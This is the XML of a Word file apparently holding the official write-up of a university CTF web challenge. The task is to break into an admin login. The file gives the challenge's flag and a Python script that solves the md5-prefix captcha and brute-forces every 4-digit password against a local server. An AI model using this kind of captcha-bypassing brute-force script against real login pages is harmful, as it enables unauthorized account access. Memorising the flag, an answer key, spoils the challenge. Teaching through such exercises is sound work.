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Web</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>0x03 HEBTU后台管理</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>题目描述：小x同学找到了HEBTU的后台管理，可是他登录不上去，你可以帮帮他么？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>考查内容：爆破</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>难易程度：中-&gt;难</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Flag：HEBTUCTF{Bru7e_f0rC3_233}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>解题过程：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>打开题目查看源码，发现提示了密码的范围：纯数字4位数，并且看到登录还有验证码？！（还要爆破验证码……）（这里这样写是因为考虑到服务器可能扛不住，所以放缓了大家爆破的速度）看来不能使用bp爆破了。这里使用脚本，附脚本：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>import requests</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>import re</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>import hashlib</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>header={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'Host': '127.0.0.1',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'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0',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'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',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'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',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'Accept-Encoding': 'gzip, deflate',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'Referer': 'http://127.0.0.1/baopo.php',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'Cookie': 'Hm_lvt_34d6f7353ab0915a4c582e4516dffbc3=1537151426,1537158118; Hm_lpvt_34d6f7353ab0915a4c582e4516dffbc3=1537158125; Hm_cv_34d6f7353ab0915a4c582e4516dffbc3=1*visitor*%E6%B8%B8%E5%AE%A2; PHPSESSID=dsgjpefe58dkqjb7nvm0n5a617',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'Connection': 'keep-alive'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for i in range(9999):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r2=requests.get(url='http://127.0.0.1/baopo.php',headers=header)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r2.encoding='utf-8'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vcode=re.findall('[0-9a-f]{5}',r2.text)[0]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j in range(10000):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hashlib.md5(j).hexdigest()[0:5]==vcode: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url='http://127.0.0.1/baopo.php?username=admin&amp;password={0}&amp;randcode={1}'.format(str(i).zfill(4),</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>str(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>j</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>)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r1=requests.get(url=url,headers=header)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r1.encoding='utf-8'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"HEBTUCTF" in r1.text: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 r1.text,i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  i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脚本需要依据具体环境进行修改，只是一个参考，大致框架已经给出，从而拿到flag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C9E2"/>
    <w:rsid w:val="FF7FC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2018-10-13T10:06:00Z</dcterms:created>
  <dc:creator>fish</dc:creator>
  <cp:lastModifiedBy>fish</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-10-13T10:07:15Z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